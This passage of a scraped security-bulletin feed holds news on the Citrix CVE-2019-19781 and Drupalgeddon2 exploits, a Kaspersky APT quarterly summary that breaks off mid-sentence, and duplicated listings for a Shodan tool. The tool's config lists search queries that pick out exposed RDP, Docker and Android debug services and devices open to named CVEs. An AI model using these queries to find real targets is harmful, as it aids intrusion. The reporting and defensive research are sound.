\n \n\n\n \nThough the cyberattacks against vulnerable servers were [first seen in the wild](<https://twitter.com/sans_isc/status/1213228049011007489>) last week when hackers developed a private exploit after reverse engineering the mitigation information, the public release of weaponized PoC would now make it easier for low-skilled script kiddies to launch cyberattacks against vulnerable organizations. \n \nAccording to [Shodan](<https://beta.shodan.io/search/facet?query=http.waf%3A%22Citrix+NetScaler%22&facet=org>), at the time of writing, there are over 125,400 Citrix ADC or Gateway servers that are publicly accessible and can be exploited overnight if not taken offline or protected using available mitigation. \n \nWhile discussing [technical details](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>) of the flaw in a blog post published yesterday, MDSec also released a video demonstration of the exploit they developed but chose not to release the exploit itself at this moment. 
\n \nBesides applying the recommended mitigation, Citrix ADC administrators are also advised to monitor their device logs for attacks.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T10:21:00", "type": "thn", "title": "PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T10:22:37", "id": "THN:6ED39786EE29904C7E93F7A0E35A39CB", "href": "https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:30", "description": "[](<https://thehackernews.com/images/-gX6_9UgesoQ/WxZDSXy_kxI/AAAAAAAAw7s/DgAtVJgBWSMc7xSNuowSunrFzg-X0mqrQCLcBGAs/s728-e100/drupal-hacking.png>)\n\nHundreds of thousands of websites running on the Drupal CMS\u2014including those of major educational institutions and government organizations around the world\u2014have been found vulnerable to a [highly critical flaw](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) for which security patches were released 
almost two months ago. \n \nSecurity researcher Troy Mursch scanned the whole Internet and [found](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repeated warnings. \n \n[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user. \n \nSince Drupalgeddon2 had great potential to draw the attention of motivated attackers, the company urged all website administrators to install security patches immediately after they were released in late March and decided not to release any technical details of the flaw initially. \n\n\n[](<https://thehackernews.com/images/-qvQEU0cUz6E/WxY-T5CZxNI/AAAAAAAAw7U/EIiGG2uydmwMhw368wlEM0s5XzpFMGG8ACLcBGAs/s728-e100/drupal-hacking-exploit.png>)\n\nHowever, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) [exploit code of Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) were published online, which was followed by large-scale Internet scanning and exploitation attempts. \n \nShortly after that, we saw attackers develop [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging the Drupalgeddon2 vulnerability to inject [cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites, within a few hours after its details went public. 
\n \nMursch scanned the Internet and found nearly 500,000 websites were running on Drupal 7, out of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2. \n \nWhile analyzing vulnerable websites, Mursch noticed that hundreds of them\u2014including those of Belgium police department, Colorado Attorney General office, Fiat subsidiary Magneti Marelli and food truck locating service\u2014have already been targeted by a new cryptojacking campaign. \n \nMursch also found some infected websites in the campaign that had already upgraded their sites to the latest Drupal version, but the cryptojacking malware still existed. \n \nWe have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the \"backdoors or fix compromised sites.\" To fully resolve the issue you are recommended to follow this [Drupal guide](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-05T08:06:00", "type": "thn", "title": "Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T08:06:24", "id": "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "href": "https://thehackernews.com/2018/06/drupalgeddon2-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:27", "description": "[](<https://3.bp.blogspot.com/-HfvtRTCYnTM/YZ3QJbhSs3I/AAAAAAAA4AU/kC3BBy581dgTiAKCIDOlmGtohgCXuQhlgCK4BGAYYCw/s1600/ShonyDanza_1_shonydanza_demo-780791.gif>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to 
desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of / \"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-01T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-01T20:30:00", "id": "KITPLOIT:4421457840699592233", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:01:24", "description": 
"[](<https://blogger.googleusercontent.com/img/a/AVvXsEjG7AfpHcNjkzZMtvplE2bYVsPCgZ1wyo5jesct_CsGBPhciWCUWFhqC4SLSNboL7iPTWtI0RpGyHZQCbSylFXDC1py1fWqO3vCbpVdYDcHTRT2va2EUO1Vp9dPAgOP6FamNin8VZZdxS42vTbMMddcAUnuN5AAWWwfJDH2pfpmQhjA5RV51QbUk8BqJQ=s586>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of /\"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: 
mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-27T20:30:00", "id": "KITPLOIT:4707889613618662864", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to_01477721372.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2019-08-01T10:44:30", "description": "\n\nFor two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. 
The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They aim to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact 'intelreports@kaspersky.com'.\n\n## The most remarkable findings\n\nIn April, we published our report on [TajMahal](<https://securelist.com/project-tajmahal/90240/>), a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System \u2013 one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named 'Tokyo' and 'Yokohama' and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. So far, our telemetry has revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet. 
This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.\n\nOn May 14, FT reported that a [zero-day vulnerability in WhatsApp](<https://www.wired.com/story/whatsapp-hack-phone-call-voip-buffer-overflow/>) had been exploited, allowing attackers to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance, such as browsing through a victim's photos and videos, accessing their contact list and more. In order to exploit the vulnerability, the attacker simply needs to call the victim via WhatsApp. This specially crafted call can trigger a buffer overflow in WhatsApp, allowing an attacker to take control of the application and execute arbitrary code in it. Apparently, the attackers used this method to not only snoop on people's chats and calls but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. The vulnerability affects WhatsApp for Android prior to 2.19.134, WhatsApp Business for Android prior to 2.19.44, WhatsApp for iOS prior to 2.19.51, WhatsApp Business for iOS prior to 2.19.51, WhatsApp for Windows Phone prior to 2.18.348 and WhatsApp for Tizen prior to 2.18.15. WhatsApp released [patches for the vulnerability](<https://www.facebook.com/security/advisories/cve-2019-3568>) on May 13. Some [have suggested](<https://www.theregister.co.uk/2019/05/14/whatsapp_zero_day/>) that the spyware may be Pegasus, developed by Israeli company NSO.\n\n## Russian-speaking activity\n\nWe continue to track the activities of Russian-speaking APT groups. 
These groups usually show a particular interest in political activities, but apart from a couple of interesting exceptions we failed to detect any remarkable examples during the last quarter.\n\nWe did find a potential connection between Hades and a leak at the RANA institute. Hades is possibly connected to the Sofacy threat actor, most notable for being behind [Olympic Destroyer](<https://securelist.com/olympic-destroyer-is-still-alive/86169/>), as well as [ExPetr](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) and several disinformation campaigns such as the Macron leaks. Earlier this year, a website named Hidden Reality published leaks allegedly related to an Iranian entity named the RANA institute. This was the third leak in two months that disclosed details of alleged Iranian threat actors and groups. Close analysis of the materials, the infrastructure and the dedicated website used by those behind the leak led us to believe that these leaks might be connected to Hades. This might be part of a disinformation campaign in which Hades helps to raise doubts about the quality of the information leaked in other cases from earlier this year.\n\nZebrocy continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear-phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. 
The targets of this new Nimcy downloader and backdoor set include diplomats, defense officials and ministry of foreign affairs staff, from whom they want to steal login credentials, keystrokes, communications, and various files. The group appears to have turned its attention towards the March events involving Pakistan and India, and unrelated diplomatic and military officials, while maintaining ongoing access to local and remote networks belonging to Central Asian governments.\n\nWe also recently observed some interesting new artifacts that we relate to Turla with varying degrees of confidence.\n\nIn April 2019, we observed a new COMpfun-related targeted campaign using new malware. The Kaspersky Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the original COMpfun is used as a downloader in one of the spreading mechanisms. We called the newly identified modules Reductor after a .pdb path left in some samples. We believe the malware was developed by the same COMpfun authors that, internally, we tentatively associated with the Turla APT, based on victimology. Besides the typical RAT functions (upload, download, execute files), Reductor's authors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The solution used by Reductor's developers to mark TLS traffic is the most ingenious part. The authors don't touch the network packets at all; instead they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process's memory. Browsers use PRNG to generate the \"client random\" sequence during the very beginning of the TLS handshake. 
Reductor adds the victims' unique encrypted hardware- and software-based identifiers to this \"client random\" field.\n\nAdditionally we identified a new backdoor that we attribute with medium confidence to Turla. The backdoor, named Tunnus, is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus's activity started last March and was still active at the time of writing.\n\nESET [has also reported](<https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/>) PowerShell scripts being used by Turla to provide direct, in-memory loading and execution of malware. This is not the first time this threat actor [has used PowerShell](<https://securelist.com/shedding-skin-turlas-fresh-faces/88069/>) in this way, but the group has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. The payloads delivered via the PowerShell scripts \u2013 the RPC backdoor and PowerStallion \u2013 are highly customized.\n\nSymantec [has also been tracking targeted attacks](<https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments>) in a series of campaigns against governments and international organizations across the globe over the past 18 months. The attacks have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of infrastructure belonging to OilRig. They have uncovered evidence that the Waterbug APT group (aka Turla, Snake, Uroburos, Venomous Bear and KRYPTON) has conducted a hostile takeover of an attack platform belonging to OilRig (aka [Crambus](<https://arstechnica.com/information-technology/2019/06/researchers-think-nation-sponsored-hackers-attacked-rival-espionage-group/>)). 
Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government that OilRig had already penetrated. This is not the first time that [we have seen](<https://www.zdnet.com/article/russian-apt-hacked-iranian-apts-infrastructure-back-in-2017/>) this type of activity. Clearly, operations of this kind make the job of attribution more difficult.\n\nThe international community continues to focus on the activity of Russian-speaking threat actors. Over the last 18 months, the UK has shared information on attacks attributed to Russian hackers with 16 NATO allies, [including attacks](<https://www.zdnet.com/article/uk-says-it-warned-16-nato-allies-of-russian-hacking-activities/>) on critical national infrastructure and attempts to compromise central government networks. In his former capacity as UK foreign secretary, Jeremy Hunt recently urged nations to band together to create a deterrent for state-sponsored hackers. As part of this push, the UK and its intelligence partners have been slowly moving towards a 'name and shame' approach when dealing with cyberattacks. The use of the 'court of public opinion' in response to cyberattacks is [a trend that we highlighted](<https://securelist.com/kaspersky-security-bulletin-threat-predictions-for-2019/88878/>) in our predictions for 2019. To help this new strategy, the EU recently passed new laws that will make it possible for EU member states to impose economic sanctions against foreign hackers.\n\nResearchers at the Microstep Intelligence Bureau [have published a report](<https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=1417>) on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor. Recently, the group launched attacks on a number of state organizations in Ukraine using Pterodo, malware used exclusively by this group. 
Since February, the attackers have deployed a large number of dynamic domain names and newly registered domain names believed to be used to launch targeted attacks against elections in Ukraine.\n\n## Chinese-speaking activity\n\nWe found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager. The campaign mainly targets government bodies in Central Asia. For persistence, the operators use .DLL search order hijacking. This consists of using a custom decryptor with a system library name (e.g., version.dll or api-ms-win-core-fibers-l1-1-1.dll) in directories, along with the legitimate applications that load these libraries into memory. Among other legitimate applications, the threat actor uses the Google updater, GoogleCrashHandler.exe, for .DLL hijacking. Custom encryptors protect the next stagers from detection on disk and from automated analysis, using the same encryption keys in different samples. For secure TLS communication with its C2, the malware uses the Secure Channel (Schannel) Windows security package.\n\nESET [discovered](<https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/>) that the attackers behind the Plead malware have been distributing it using compromised routers and man-in-the-middle (MITM) attacks in April. Researchers have detected this activity in Taiwan, where the Plead malware has been most actively deployed. Trend Micro [has previously reported](<https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf>) the use of this malware in targeted attacks by the BlackTech group, primarily focused on cyber-espionage in Asia. 
ESET telemetry has revealed multiple attempts to deploy it.\n\nLuckyMouse activity [detected](<https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/>) by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East, probably exploiting CVE-2019-0604, a remote code execution vulnerability used to compromise the server and eventually install a web shell. The actors uploaded a variety of tools that they used to perform additional activities on the compromised network, such as dumping credentials, as well as locating and pivoting to additional systems on the network. Of particular note is the group's use of tools to identify systems vulnerable to CVE-2017-0144, the vulnerability exploited by EternalBlue and used in the 2017 WannaCry attacks. This activity appears to be related to campaigns exploiting CVE-2019-0604 mentioned in recent security alerts from the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security.\n\nLast year, a number of Chinese hackers allegedly linked to the Chinese government were indicted in the US. In May, the US Department of Justice indicted a Chinese national for a [series of computer intrusions](<https://www.justice.gov/opa/pr/member-sophisticated-china-based-hacking-group-indicted-series-computer-intrusions-including>), including the 2015 data breach of health insurance company Anthem which affected more than 78 million people.\n\n## Middle East\n\nThe last three months have been very interesting for this region, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. 
Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.\n\nIn March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. Several files were shared via Telegram that supposedly belonged to the OilRig threat actor. They included logins and passwords of several alleged hacking victims, tools, infrastructure details potentially related to different intrusions, the r\u00e9sum\u00e9s of the alleged attackers and a list of web shells \u2013 apparently relating to the period 2014-18.\n\nThe targeting and TTPs are consistent with this threat actor, but it was impossible to confirm the origins of the tools included in the dump. Assuming that the data in the dump is accurate, it also shows the global reach of the OilRig group, which has generally been thought to operate primarily in the Middle East.\n\nOn April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, \"along with information about their mother and spouse and etc.\", for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that \"highly confidential\" information related to MuddyWater would be put up for sale.\n\nOn April 27, three screenshots were posted in the GreenLeakers Telegram channel, containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.\n\nFinally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. 
It was the third leak in two months disclosing details of alleged Iranian threat actors and groups.\n\nInterestingly, this leak differed from the others by employing a website that allows anyone to browse the leaked documents. It also relies on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute's CNO (Computer Network Operations) capabilities, as well as information about victims. Previous leaks were focused more on tools, source code and individual actor profiles.\n\nClose analysis of the materials, the infrastructure and the dedicated website used by the leakers provided clues that led us to believe Sofacy/Hades may be connected to these leaks.\n\nThere was also other MuddyWater activity unrelated to the leak, as well as discoveries linked to previous activity by the group, such as ClearSky's discovery of two domains hacked by MuddyWater at the end of 2018 to host the code of its POWERSTATS malware.\n\nIn April, Cisco Talos [published its analysis](<https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html>) of the BlackWater campaign, related to MuddyWater activity. The campaign shows how the attackers added three distinct steps to their operations, allowing them to bypass certain security controls to evade detection: an obfuscated VBA script to establish persistence as 